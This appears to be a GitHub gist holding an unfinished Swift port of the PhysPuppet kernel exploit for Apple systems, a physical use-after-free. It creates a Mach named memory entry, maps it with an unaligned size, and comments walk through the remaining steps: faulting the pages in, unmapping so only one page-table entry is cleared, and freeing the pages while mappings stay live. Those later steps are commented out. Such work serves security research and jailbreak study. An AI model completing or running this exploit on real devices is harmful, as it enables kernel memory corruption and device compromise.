Skip to content

Instantly share code, notes, and snippets.

@JJTech0130
Created February 17, 2024 03:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JJTech0130/846b92cb0d9bb195f090bfacefd6d8b4 to your computer and use it in GitHub Desktop.
Save JJTech0130/846b92cb0d9bb195f090bfacefd6d8b4 to your computer and use it in GitHub Desktop.
trying to come up with a port of https://github.com/felix-pb/kfd/blob/main/kfd/libkfd/puaf/physpuppet.h in pure Swift
import Foundation
let ARM_PGBYTES: UInt64 = 4096
let physpuppet_vmne_size: UInt64 = ARM_PGBYTES * 2 + 1
let physpuppet_vme_offset = UInt(ARM_PGBYTES)
let physpuppet_vme_size = UInt(ARM_PGBYTES * 2)
func mach_task_self() -> task_t {
return mach_task_self_
}
func phspuppet_run(puaf_pages: UInt) {
print("Trying PhysPuppet exploit...")
for i in 0..<puaf_pages {
print("Page \(i) of \(puaf_pages)...")
/*
* STEP 1:
*
* Create a vm_named_entry. It will be backed by a vm_object with a
* vo_size of 3 pages and an initial ref_count of 1.
*/
var named_entry: mach_port_t = 0
let ret = mach_memory_object_memory_entry_64(mach_host_self(), 1, physpuppet_vmne_size, VM_PROT_DEFAULT, MEMORY_OBJECT_NULL, &named_entry)
assert (ret == KERN_SUCCESS)
/*
* STEP 2:
*
* Map the vm_named_entry into our vm_map. This will create a
* vm_map_entry with a vme_start that is page-aligned, but a vme_end
* that is not (vme_end = vme_start + 1 page + 1 byte). The new
* vm_map_entry's vme_object is shared with the vm_named_entry, and
* therefore its ref_count goes up to 2. Finally, the new vm_map_entry's
* vme_offset is 1 page.
*/
var address: vm_address_t = 0
print(mach_task_self())
let ret2 = vm_map(mach_task_self(), &address, UInt.max, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR, named_entry, physpuppet_vme_offset, 0, VM_PROT_DEFAULT, VM_PROT_DEFAULT, VM_INHERIT_DEFAULT)
print(ret2)
// assert (ret2 == KERN_SUCCESS)
/*
* STEP 3:
*
* Fault in both pages covered by the vm_map_entry. This will populate
* the second and third vm_pages (by vmp_offset) of the vm_object. Most
* importantly, this will set the two L3 PTEs covered by that virtual
* address range with read and write permissions.
*/
// memset(UnsafeMutableRawPointer(bitPattern: address), 65, Int(physpuppet_vme_size))
/*
* STEP 4:
*
* Unmap that virtual address range. Crucially, when vm_map_delete()
* calls pmap_remove_options(), only the first L3 PTE gets cleared. The
* vm_map_entry is deallocated and therefore the vm_object's ref_count
* goes down to 1.
*/
// let ret3 = vm_deallocate(mach_task_self(), address, physpuppet_vme_size)
// assert (ret3 == KERN_SUCCESS)
/*
* STEP 5:
*
* Destroy the vm_named_entry. The vm_object's ref_count drops to 0 and
* therefore is reaped. This will put all of its vm_pages on the free
* list without calling pmap_disconnect().
*/
// let ret4 = mach_port_deallocate(mach_task_self(), named_entry)
//kfd->puaf.puaf_pages_uaddr[i] = address + ph
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment